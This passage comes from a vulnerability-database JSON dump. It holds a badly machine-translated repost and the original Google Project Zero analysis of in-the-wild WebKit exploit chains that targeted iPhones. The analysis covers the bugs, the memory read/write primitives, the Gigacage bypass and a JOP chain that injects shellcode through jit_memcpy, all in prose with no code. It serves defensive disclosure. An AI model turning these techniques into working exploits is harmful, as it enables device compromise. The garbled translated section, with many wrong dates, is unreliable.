bypass on the A12 on the device are enabled based on PAC JIT strengthen mitigation measures. Exploits by vulnerability to support the latest iOS version, if the exploit is missing in the version check, it will be based on the repair date and prior to the vulnerability to guess the supported version range. \nThe sandboxed renderer process using the first get memory read/write functions, and then the shellcode injected into the JIT area to obtain the native code execution privileges. It seems every time you broke a new major can exploit the vulnerability, the new vulnerability will be added to the framework to use to do read/write check, and then inserted into the existing exploit frameworks. The exploits used are also common exploit techniques, for example, first create addrof and fakeobj primitive, then fake JS object to implement the read/write. \nFor many exploit programs, it is unclear whether they have in some 0day or 1day on successful use. Now also don't know the attacker is how to first get these vulnerability information. Typically, they are used to repair the finish after the release of the public exploit to use. WebKit in the fix version is sent to the user before publishing the vulnerability details. CVE-2019-8518 is in 2019 2 May 9, WebKit HEAD disclosed in repair, submitted for 4a23c92e6883 it. This commit contains a test case, the test cases triggered a vulnerability and lead to a JSArray of cross-border access, this situation is usually very easy to exploit. However, the fixes only in 2019 3 December 25 release iOS 12.2 user post, is in about the vulnerability details publicly after a month and a half before release. The technical ability of the user to be within a few days time to replace the underlying vulnerabilities, thereby obtaining the advantage of the latest capabilities of the device, without self-tap new holes. This may occur at least in some of the following vulnerabilities in. \nIn order to do the comparison, the following is a list of the other browser vendors is how to deal with this vulnerability window problems: \nGoogle and Chromium the same problem exists, for example, submitted 52a9e67a477b fix for CVE-2018-17463-in. However, it seems some of the recent vulnerabilities release no longer contains the JavaScript test cases. For example, our team members Sergey Glazunov reported the following two for the vulnerability fix: aa00ee22f8f7 for vulnerability 1784 and 4edcc8605461 for vulnerability 1793 in. \nMicrosoft will open source the Chakra engine in the security fixes that confidential treatment until the fix has been sent to the user before the public. Then released the repair after the procedure and publishes the CVE number. For this example, see commit 7f0d390ad77d it. However, it should be noted that the Chakra will soon be the Edge of the V8\uff08Chromium's JavaScript engine replaced. \nMozilla directly prohibits a public repository of security fixes, they will directly release the next version. In addition, it is not disclosed for triggering a vulnerability in the JavaScript test cases. \nHowever, it is worth noting that, even if the Don't get the JavaScript test case, you can still through a code patch written in the PoC and eventually exploit the vulnerability. \n\n0x01 exploit 1: iOS 10.0~10.3.2 \nThis exploits the target is CVE-2017-2505, initially by lokihardt report for Project Zero issue 1137, and in 2017 to 3 January 11, on the WebKit HEAD by submission 4a23c92e6883 repair. The fix is then in the 5 on 15, publishing to the iOS 10.3.2 the user. Interestingly, the exploit exp is almost the WebKit repository in the bug report and test file exactly the same. You can see in the image below, the left image is displayed in the WebKit code repository publish a test with the example on the right shows the triggering of vulnerabilities in the wild exploit code part. \n! [](/Article/UploadPic/2019-9/2019917134229760. png) \nThe vulnerability will lead to the use of controlled data writes to achieve the JSC heap bounds. Attacker destruction of controlled JSObject one of the first QWord, changing its structure ID to the run-time type information with JSCell associated with to make it appear as a Uint32Array with. Thus, they actually created a fake TypedArray, will directly allow them to construct a memory read/write primitives. \n\n0x02 exploit 2: iOS 10.3~10.3.3 \nThe exploit is for CVE-2017-7064 or its variant, which was originally by lokihardt found and reported as issue 1236 in. The vulnerability has been in 2017 4 November 18 in the WebKit HEAD by submission ad6d74945b13 repair, and in 2017, the 7 on 19, released to the iOS 10.3.3 of the user. The vulnerabilities could cause uninitialized memory to be treated as JS array of content, through reactor operation technology, you can control the uninitialized data, this time by the double-precision and JSValues between the type of confused structure addrof and fakeobj primitive, so that by construction forged TypedArray get memory read/write. \n\n0x03 exploit 3: iOS 11.0~11.3 \nThis exploit is a WebKit vulnerability 181867, the CVE number might be CVE-2018-4122\u3002 It in 2018 1 November 19 in the WebKit HEAD in repair, and in 2018 3 May 29, released to iOS 11.3 the user. The vulnerability is typical of the JIT side-effect problems. It is unclear how the attacker is in early 2018 will know of this vulnerability. The vulnerability through the confusion is not initialized double, and Whether the array built addrof and fakeobj primitive, and then again by forgery to obtain memory read/write a typed array of objects. \n\n0x04 exploits 4: iOS 11.3~11.4.1 \nThis exploit is for the 2018 \u5e74 5 \u6708 16 filed in the b4e567d371fd fix the vulnerability, and corresponding to the WebKit bug report 185694 it. Unfortunately, we are unable to determine the allocation to this issue of the CVE, but it seems that the patches in 2018 7 May 9, publishing to the iOS 11.4.1 the user. This is another JIT side-effect issues, similar to the previous vulnerability, again constructed fakeobj primitive to forge a JS object. However, it has now been released Gigacage mitigation measures. Therefore, construction of the pseudo-ArrayBuffers / TypedArrays are no longer useful. \nThe exploit constructs a fake unboxed double Array, and get an initial, limited memory read/write primitives. Then using the initial primitive to disable Gigacage mitigation measures, and then continue to use TypedArrays to perform behind the exploits. \n\n0x05 exploit 5: iOS 11.4.1 \nThe exploit is for CVE-2018-4438 vulnerability, the lokihardt report of 1649 it. This vulnerability is in 2018 10 May 26 using the commit 8deb8bd96f4a repair, and in 2018, 12 \u6708 5 issued to the iOS 12.1.1 the user. The wrong hole you can build a proxy the prototype of the array, and then, by the JIT-compiled code in the trigger change, this vulnerability is converted to the JIT side-effect problems. The vulnerability before the vulnerability is very similar, first using the limited JS array read/write disable Gigacage mitigation measures, and then by TypedArrays perform a full read/write the shellcode to be injected. \n\n\n**[1] [[2]](<96030_2.htm>) [next](<96030_2.htm>)**\n", "edition": 1, "modified": "2019-09-17T00:00:00", "published": "2019-09-17T00:00:00", "id": "MYHACK58:62201996030", "href": "http://www.myhack58.com/Article/html/3/62/2019/96030.htm", "title": "In-depth exploration found in the wild iOS exploit chain VI-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:04", "bulletinFamily": "info", "cvelist": ["CVE-2017-2505", "CVE-2017-7064", "CVE-2018-17463", "CVE-2018-4122", "CVE-2018-4438", "CVE-2018-4442", "CVE-2019-6217", "CVE-2019-8518", "CVE-2019-8646"], "description": "Posted by Samuel Gro\u00df, Project Zero\n\n** \n** \n\n\nIn this post, we will take a look at the WebKit exploits used to gain an initial foothold onto the iOS device and stage the privilege escalation exploits. All exploits here achieve shellcode execution inside the sandboxed renderer process (WebContent) on iOS. Although Chrome on iOS would have also been vulnerable to these initial browser exploits, they were only used by the attacker to target Safari and iPhones. \n \nAfter some general discussion, this post first provides a short walkthrough of each of the exploited WebKit bugs and how the attackers construct a memory read/write primitive from them, followed by an overview of the techniques used to gain shellcode execution and how they bypassed existing JIT code injection mitigations, namely the \u201cbulletproof JIT\u201d. \n \nIt is worth noting that none of the exploits bypassed the new, PAC-based JIT hardenings that are enabled on A12 devices. The exploit writeups are sorted by the most recent iOS version the exploit supports as indicated by a version check in the exploit code itself. If that version check was missing from the exploit, the supported version range was guessed based on the date of the fix and the previous exploits. \n \nThe renderer exploits follow common practice and first gain memory read/write capabilities, then inject shellcode into the JIT region to gain native code execution. In general it seems that every time a new bug was necessary/available, the new bug was exploited for read/write and then plugged into the existing exploit framework. The exploits for the different bugs also appear to generally use common exploit techniques, e.g. by first creating [the addrof and fakeobj primitives](<http://www.phrack.org/papers/attacking_javascript_engines.html>), then faking JS objects to achieve read/write. \n \nFor many of the exploits it is unclear whether they were originally exploited as 0day or as 1day after a fix had already shipped. It is also unknown how the attackers obtained knowledge of the vulnerabilities in the first place. Generally they could have discovered the vulnerabilities themselves or used public exploits released after a fix had shipped. Furthermore, at least for WebKit, it is often possible to extract details of a vulnerability from the public source code repository before the fix has been shipped to users. [CVE-2019-8518](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1775>) can be used to highlight this problem (as can many other recent vulnerabilities). The vulnerability was publicly fixed in WebKit HEAD on Feb 9 2019 with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>). This commit contains a testcase that triggers the issue and causes an out-of-bounds access into a JSArray - a scenario that is usually easy to exploit. However, the fix only shipped to users with the release of iOS 12.2 on March 25 2019, roughly one and a half months after details about the vulnerability were public. An attacker in possession of a working exploit for an older WebKit vulnerability would likely only need a few days to replace the underlying vulnerability and thus gain the capability to exploit up-to-date devices without the need to find new vulnerabilities themselves. It is likely that this happened for at least some of the following exploits. \n \nFor comparison, here is how other browser vendors deal with this \u201cpatch-gap\u201d or vulnerability window problem:\n\n * Google has this same problem with Chromium (e.g. commit [52a9e67a477b](<https://chromium.googlesource.com/v8/v8.git/+/52a9e67a477bdb67ca893c25c145ef5191976220>) fixing [CVE-2018-17463](<http://www.phrack.org/papers/jit_exploitation.html>) and including a PoC trigger). However, it appears that some recent bugfixes no longer include the JavaScript test cases commits. For example the following two fixes for vulnerabilities reported by our team member Sergey Glazunov: [aa00ee22f8f7](<https://chromium.googlesource.com/v8/v8.git/+/aa00ee22f8f7722b505fc24acf7e544dfe59ce77>) (for issue [1784](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1784>)) and [4edcc8605461](<https://chromium.googlesource.com/v8/v8.git/+/4edcc860546157cb35940663afb9af568595888f>) (for issue [1793](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1793>)). In the latter case, only a C++ test was added that tested the new behaviour without indication of how the vulnerable code could be reached.\n\n * Microsoft keeps security fixes in the open source Chakra engine private until the fixes have been shipped to users. The security fixes are then released and marked as such with a CVE identifier. See commit [7f0d390ad77d](<https://github.com/microsoft/ChakraCore/commit/7f0d390ad77d838cbb81d4586c83ec822f384ce8>) for an example of this. However, it should be noted that Chakra will soon be replaced by V8 (Chromium\u2019s JavaScript engine) in Edge.\n\n * Mozilla appears to hold back security fixes from the public repository until somewhat close to the next release. Furthermore, the commits usually do not include the JavaScript testcases used to trigger the vulnerability.\n\n \nHowever, it is worth noting that even if no JavaScript testcase is attached to the commit, it is often still possible to reconstruct a trigger (and ultimately an exploit) for the vulnerability from the code changes and/or commit message with moderate effort. \n\n\n## Exploit 1: iOS 10.0 until 10.3.2\n\nThis exploit targets CVE-2017-2505 which was originally reported by lokihardt as Project Zero issue [1137](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1137>) and fixed in WebKit HEAD with commit [4a23c92e6883](<https://github.com/WebKit/webkit/commit/4a23c92e6883b230a437bcc09f94422d7df8756c>) on Mar 11th 2017. The fix was then shipped to users with the release of iOS 10.3.2 on May 15th 2017, over two months later. \n \nOf interest, the exploit trigger is almost exactly the same as in the bug report and the regression test file in the WebKit repository. This can be seen in the following two images, the left one showing the testcase published in the WebKit code repository as part of the bugfix and the right showing the part of the in-the-wild exploit code that triggered the bug.\n\n \n \n\n\n[](<https://1.bp.blogspot.com/-PEZlVLEefs0/XWg4BdDSxkI/AAAAAAAANUs/ELjHWgzHOZIRKSTV45E-moRivJKrAWIkACLcBGAs/s1600/JSC%2BDIFF.png>)\n\n \nThe bug causes an out-of-bounds write to the JSC heap with controlled data. The attackers exploit this by corrupting the first QWord of a controlled JSObject, changing its Structure ID (which associates runtime type information with a JSCell) to make it appear as a Uint32Array instead. This way, they essentially create a fake TypedArray which directly allows them to construct a memory read/write primitive.\n\n## Exploit 2: iOS 10.3 until 10.3.3\n\nThis exploit seems to target CVE-2017-7064 (or a variant thereof), which was originally discovered by lokihardt and reported as issue [1236](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1236>). The bug was fixed in WebKit HEAD with commit [ad6d74945b13](<https://github.com/WebKit/webkit/commit/ad6d74945b13a8ca682bffe5b4e9f1c6ce0ae692>) on Apr 18th 2017 and shipped to users with the release of iOS 10.3.3 on Jul 19th 2017, over three months later. \n \nThe bug causes uninitialized memory to be treated as the content of a JS Array. Through standard heap manipulation techniques it is possible to control the uninitialized data, at which point it becomes possible to construct the well-known addrof and fakeobj primitives through a type confusion between doubles and JSValues and thus gain memory read/write by constructing a fake TypedArray.\n\n## Exploit 3: likely iOS 11.0 until 11.3\n\nThis exploit targets the WebKit bug [181867](<https://bugs.webkit.org/show_bug.cgi?id=181867>) which might be CVE-2018-4122. It was fixed in WebKit HEAD on Jan 19, 2018 and presumably shipped to users with the release of iOS 11.3 on Mar 29th 2018. \n \nThe bug is a classic (by 2019 standards) [JIT side-effect modelling issue](<https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf>). It remains unclear whether the attackers knew about this bug class before it started to be widely known around the beginning of 2018. The exploit again constructs the addrof and fakeobj primitives by confusing unboxed double and JSValue arrays, then gains memory read/write by again faking a typed array object.\n\n## Exploit 4: likely iOS 11.3 until 11.4.1\n\nThis exploit targets the bug fixed in commit [b4e567d371fd](<https://github.com/WebKit/webkit/commit/b4e567d371fde84474a56810a03bf3d0719aed1e>) on May 16th 2018 and corresponding to WebKit issue [185694](<https://bugs.webkit.org/show_bug.cgi?id=185694>). Unfortunately, we were unable to determine the CVE assigned to this issue, but it seems likely that the fix shipped to users with the release of iOS 11.4.1 on Jul 9th 2018. \n \nThis is another JIT side-effect modelling bug with similar exploit to the previous one, again constructing the fakeobj primitive to fake JS object. However, by now the [Gigacage mitigation](<https://labs.mwrinfosecurity.com/blog/some-brief-notes-on-webkit-heap-hardening/>) had shipped. As such it was no longer useful to construct fake ArrayBuffers/TypedArrays. Instead, the exploit constructs a fake unboxed double Array and with that gains an initial, somewhat limited memory read/write primitive. It then appears to use that initial primitive to disable the Gigacage mitigation and then continues to abuse TypedArrays to perform the rest of the exploit work.\n\n## Exploit 5: iOS 11.4.1\n\nThis exploit targets CVE-2018-4438, which was first reported by lokihardt as issue [1649](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1649>). The bug was fixed with commit [8deb8bd96f4a](<https://github.com/WebKit/webkit/commit/8deb8bd96f4a27bf8bb60334c9247cc14ceab2eb>) on Oct 26th 2018 and shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nDue to the bug, it was possible to construct an Array with a Proxy prototype that wasn\u2019t expected by the engine. It is then possible to turn this bug into an incorrect side-effect modelling issue by performing effectful changes during a proxy trap triggered (unexpectedly) in JIT compiled code. The exploit is then very similar to the previous one, first disabling the Gigacage with the limited JS Array read/write, then performing the shellcode injection with a full read/write via TypedArrays.\n\n## Exploit 6: likely iOS 12.0 until 12.1.1\n\nThis exploit targets CVE-2018-4442, which was originally discovered by lokihardt and reported as issue [1699](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1699>) and fixed in HEAD with commit [1f1683cea15c](<https://github.com/WebKit/webkit/commit/1f1683cea15c2af14710b4b73f89b55004618295>) on Oct 17th 2018. The fix then shipped to users with the release of iOS 12.1.1 on Dec 5th 2018. \n \nIn contrast to the other bugs, this bug yields a use-after-free in the JavaScriptEngine. Similar to the PoC in the WebKit tracker, the attackers abuse the UaF by freeing the property backing storage of an object (the butterfly), then reclaim that storage with a [JSBoundFunction\u2019s m_boundArgs](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.h#L57>) array by repeatedly calling func.bind(). If that is successful, the attackers are now able to get access to an internal object, m_boundArgs, by loading a property from the freed object\u2019s butterfly. With that, it becomes possible to construct an OOB access by making the m_boundArgs array sparse, then calling the bound function. This will invoke [JSBoundFunction::boundArgsCopy](<https://github.com/WebKit/webkit/blob/master/Source/JavaScriptCore/runtime/JSBoundFunction.cpp#L216>) which assumes that m_boundArgs is dense and otherwise reads JSValues past the end of a buffer which it passes as argument to a controlled function (that was bound() previously). \n \nThis fact has been exploited in the past, which is why there is now a comment next to the definition of m_boundArgs: `// DO NOT allow this array to be mutated!`. From there, the attackers again construct the addrof and fakeobj primitives and reuse the rest of the exploit from before.\n\n## Exploit 7: iOS 12.1.1 until 12.1.3\n\nThe final exploit targets the same bug as exploited by Linus Henze here: [https://github.com/LinusHenze/WebKit-RegEx-Exploit](<https://github.com/LinusHenze/WebKit-RegEx-Exploit>), which is again a JIT side-effect modelling issue. The WebKit bugtracker id for it appears to be [191731](<https://bugs.webkit.org/show_bug.cgi?id=191731>). It is unclear whether a CVE number was assigned to it, but it could be CVE-2019-6217 which was disclosed during mobile Pwn2Own that year by Team flouroacetate. The bug seems to have been fixed on Nov 16th 2018 and shipped to users with the release of iOS 12.1.3 on Jan 22nd 2019. \n \nInstead of using WASM objects to gain memory read/write as Linus does, the attackers appear to instead have plugged the new bug into their old exploit and again create a fake JS Array to gain initial memory read/write capabilities, then continue the same way they did before.\n\n## Shellcode Execution\n\nAfter gaining memory read/write capabilities, the renderer exploit pivots to shellcode execution, which then performs the privilege escalation exploits. The way they achieve shellcode execution is the same in all exploits: by bypassing the JIT mitigations to overwrite an existing function\u2019s JIT code and then invoking that function. \n \nFor some time now (first announced by Apple at [BlackHat 2016](<https://www.blackhat.com/docs/us-16/materials/us-16-Krstic.pdf>) and then shipped with iOS 10), iOS features a JIT hardening measure that aims to make it more difficult for an attacker to write code directly into the RWX JIT region. It basically achieves that by creating a second, \u201chidden\u201d mapping of the JIT region that is writable and keeping the first mapping of the region non-writable. However, one weakness of this approach, and acknowledged in the presentation by Apple, is that there has to be a \u201cjit_memcpy\u201d function that is called to copy the generated code into the JIT region. As such, it remains viable to perform a ROP or JOP style attack to execute this function with controlled shellcode as argument. This is what the attackers do as well. This problem now appears to be somewhat mitigated on PAC enabled devices by signing the JIT code during code generation and verifying the signature later on. The exploits we found did not include a bypass for PAC enabled devices and instead bailed out if they ran on an A12 device. \n \nIn more detail, the attackers construct a JOP chain, consisting of three different gadgets that allow them to perform a function call of an arbitrary function with controlled arguments. To kick off the chain, they replace the native function pointer of the `escape` JS function with the first gadget of the chain. The chain then performs a call to the \u201djit_memcpy\u201d function to overwrite the JIT code of a previously compiled function with the shellcode. Finally they replace the function pointer of `escape` one last time and point it to the shellcode inside the JIT region.\n", "modified": "2019-08-29T00:00:00", "published": "2019-08-29T00:00:00", "id": "GOOGLEPROJECTZERO:A46B3136EBE92DFE53548BB20EFF1ABC", "href": "https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html", "type": "googleprojectzero", "title": "\nJSC Exploits\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}